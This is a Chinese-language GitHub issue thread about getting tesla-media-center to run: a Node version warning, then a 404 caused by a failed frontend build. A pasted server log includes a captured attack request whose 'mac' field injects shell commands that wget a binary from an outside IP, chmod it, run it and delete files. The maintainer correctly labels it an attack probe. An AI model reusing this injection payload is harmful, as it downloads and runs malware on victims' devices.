### ISSUE TITLE
可能版本不同？怎么解决这个错误

### ISSUE THREAD

**Issue by wellbug** [HelloClyde/tesla-media-center#1]
报错
npm WARN notsup Not compatible with your version of node/npm: @esbuild/linux-x64@0.18.20
npm WARN notsup Unsupported engine for @esbuild/openbsd-x64@0.18.20: wanted: {"node":">=12"} (current: {"node":"10.24.0","npm":"6.14.11"})
npm WARN notsup Not compatible with your version of node/npm: @esbuild/openbsd-x64@0.18.20
npm WARN optional SKIPPING OPTIONAL DEPENDENCY: @esbuild/openbsd-x64@0.18.20 (node

**Comment by HelloClyde** [comment]
把nodejs版本更新到12以上

**Comment by wellbug** [comment]
感谢 出现这个错误
Error handling request
Traceback (most recent call last):
  File "/root/tesla-media-center/enter/envs/tmc/lib/python3.10/site-packages/aiohttp/web_protocol.py", line 350, in data_received
    messages, upgraded, tail = self._request_parser.feed_data(data)
  File "aiohttp/_http_parser.pyx", line 557, in aiohttp._http_parser.HttpParser.feed_data
aiohttp.http_exceptions.BadStatusLine: 400, message:
  Invalid method encountered:

    b'time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.174.73.190/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;'
      ^
2024-04-23 20:26:45.129 | INFO     | __main__:static_web:56 - static file request:index.html
网页访问出现404 错误
404: Not Found

> 把nodejs版本更新到12以上

**Comment by HelloClyde** [comment]
``

> 感谢 出现这个错误 Error handling request Traceback (most recent call last): File "/root/tesla-media-center/enter/envs/tmc/lib/python3.10/site-packages/aiohttp/web_protocol.py", line 350, in data_received messages, upgraded, tail = self._request_parser.feed_data(data) File "aiohttp/_http_parser.pyx", line 557, in aiohttp._http_parser.HttpParser.feed_data aiohttp.http_exceptions.BadStatusLine: 400, message: Invalid method encountered:
> 
> ```
> b'time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.174.73.190/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;'
>   ^
> ```
> 
> 2024-04-23 20:26:45.129 | INFO | **main**:static_web:56 - static file request:index.html 网页访问出现404 错误 404: Not Found
> 
> > 把nodejs版本更新到12以上

`Error handling request
Traceback (most recent call last):
File "/root/tesla-media-center/enter/envs/tmc/lib/python3.10/site-packages/aiohttp/web_protocol.py", line 350, in data_received
messages, upgraded, tail = self._request_parser.feed_data(data)
File "aiohttp/_http_parser.pyx", line 557, in aiohttp._http_parser.HttpParser.feed_data
aiohttp.http_exceptions.BadStatusLine: 400, message:
Invalid method encountered:`

这段错误看起来像是被攻击了，应该是有请求尝试往这个端口注入恶意的代码，但是应该对这个项目没什么用，可以直接忽略。


不work的原因，还是访问/index.html返回404

你需要检查web/dist/index.html是否存在，如果不存在说明你的前端代码build失败了，需要检查下前端代码build的报错信息
